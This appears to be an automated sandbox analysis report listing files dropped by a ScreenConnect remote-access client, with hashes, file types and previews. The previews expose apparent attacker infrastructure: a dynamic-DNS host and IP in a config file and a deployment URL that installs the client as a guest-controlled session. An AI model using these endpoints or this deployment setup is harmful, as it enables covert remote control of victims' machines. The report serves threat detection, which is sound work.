Entropy (8bit):	4.690426481732819
Encrypted:	false
SSDEEP:	48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
MD5:	2744E91BB44E575AD8E147E06F8199E3
SHA1:	6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
SHA-256:	805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
SHA-512:	586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
Malicious:	false
Preview:	<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\qi3ba00y.newcfg

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	561
Entropy (8bit):	5.055722043439876
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO1CC27ue/vXbAa3xT:2dL9hK6E46YPDCBuEvH
MD5:	81C64C3DB2EC4BF89D73190F151C713F
SHA1:	1B7861BE0C96EFC39D66FB9030B7930F287768FE
SHA-256:	77DD75B6A2DF9B8113D7F1E543C9C3D426D828298FE075D3C44ADF494D437642
SHA-512:	1E6C52EC0C709E6A8B182F01D75650788D881A74FBBC946C622A209A28D8964C4DF11C5503FA750F3AE235E3F3674726C25D4C18C75A46675AE52DC81551E39D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>qpkl23.zapto.org=79.110.49.196-30%2f09%2f2024%2012%3a20%3a24</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\user.config (copy)

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	561
Entropy (8bit):	5.055722043439876
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO1CC27ue/vXbAa3xT:2dL9hK6E46YPDCBuEvH
MD5:	81C64C3DB2EC4BF89D73190F151C713F
SHA1:	1B7861BE0C96EFC39D66FB9030B7930F287768FE
SHA-256:	77DD75B6A2DF9B8113D7F1E543C9C3D426D828298FE075D3C44ADF494D437642
SHA-512:	1E6C52EC0C709E6A8B182F01D75650788D881A74FBBC946C622A209A28D8964C4DF11C5503FA750F3AE235E3F3674726C25D4C18C75A46675AE52DC81551E39D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>qpkl23.zapto.org=79.110.49.196-30%2f09%2f2024%2012%3a20%3a24</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.068776675019683
Encrypted:	false
SSDEEP:	1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
MD5:	0402CF8AE8D04FCC3F695A7BB9548AA0
SHA1:	044227FA43B7654032524D6F530F5E9B608E5BE4
SHA-256:	C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
SHA-512:	BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1373
Entropy (8bit):	5.369201792577388
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
MD5:	1BF0A215F1599E3CEC10004DF6F37304
SHA1:	169E7E91AC3D25D07050284BB9A01CCC20159DE7
SHA-256:	D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
SHA-512:	68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1662
Entropy (8bit):	5.368796786510097
Encrypted:	false
SSDEEP:	48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
MD5:	F133699E2DFF871CA4DC666762B5A7FF
SHA1:	185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
SHA-256:	9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
SHA-512:	8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\DU2B58II.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (614), with CRLF line terminators
Category:	dropped
Size (bytes):	14926
Entropy (8bit):	3.812975223975152
Encrypted:	false
SSDEEP:	96:t6BK0ZJTdfqHgcNfNpUBBaOy0lmZJTdfqHgcNEWBf/p87kQ2ZJTdfqHgcNJayaus:OJqHzRUaxJqHzN5RJqHzlHLEv
MD5:	1F3EE207FFA0AE973893D6DE82514510
SHA1:	E86BC7B43E9344C9DC4871DCB8FE578C7B8AE1D2
SHA-256:	939855A0C9B07B04DB60B35D397ED4A6352FE8B4FA201A27BF9D9DDF5D17FE49
SHA-512:	4E08FEAD048F5E74F3345AAF03F7628C60ED3A66E4730D6B0271E046A2039DB108E70A28F40C56E87D9E96972BF2858E43E6B3BAF5057083724CB1D3BB12410E
Malicious:	false
Preview:	..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.u.p.p.h.e.l.p...t.o.p./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.q.p.k.l.2.3...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.c.7.5.c.f.5.8.1.-.c.0.8.1.-.4.b.d.7.-.9.6.d.a.-.5.9.3.3.e.5.

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.58476728626163
Encrypted:	false
SSDEEP:	3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
MD5:	AE0E6EBA123683A59CAE340C894260E9
SHA1:	35A6F5EB87179EB7252131A881A8D5D4D9906013
SHA-256:	D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
SHA-512:	1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Client.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	5.147328807370198
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
MD5:	2EA1AC1E39B8029AA1D1CEBB1079C706
SHA1:	5788C00093D358F8B3D8A98B0BEF5D0703031E3F
SHA-256:	8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
SHA-512:	6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.068776675019683
Encrypted:	false
SSDEEP:	1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
MD5:	0402CF8AE8D04FCC3F695A7BB9548AA0
SHA1:	044227FA43B7654032524D6F530F5E9B608E5BE4
SHA-256:	C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
SHA-512:	BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.ClientService.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	5.084538887646832
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
MD5:	E11E5D85F8857144751D60CED3FAE6D7
SHA1:	7E0AE834C6B1DEA46B51C3101852AFEEA975D572
SHA-256:	ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
SHA-512:	5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505346220942731
Encrypted:	false
SSDEEP:	1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
MD5:	361BCC2CB78C75DD6F583AF81834E447
SHA1:	1E2255EC312C519220A4700A079F02799CCD21D6
SHA-256:	512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
SHA-512:	94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.031251664661689
Encrypted:	false
SSDEEP:	6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
MD5:	16C4F1E36895A0FA2B4DA3852085547A
SHA1:	AB068A2F4FFD0509213455C79D311F169CD7CAB8
SHA-256:	4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
SHA-512:	AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Core.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.1303806593325705
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
MD5:	2343364BAC7A96205EB525ADDC4BBFD1
SHA1:	9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
SHA-256:	E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
SHA-512:	AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639136400085158
Encrypted:	false
SSDEEP:	24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
MD5:	9F823778701969823C5A01EF3ECE57B7
SHA1:	DA733F482825EC2D91F9F1186A3F934A2EA21FA1
SHA-256:	ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
SHA-512:	FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
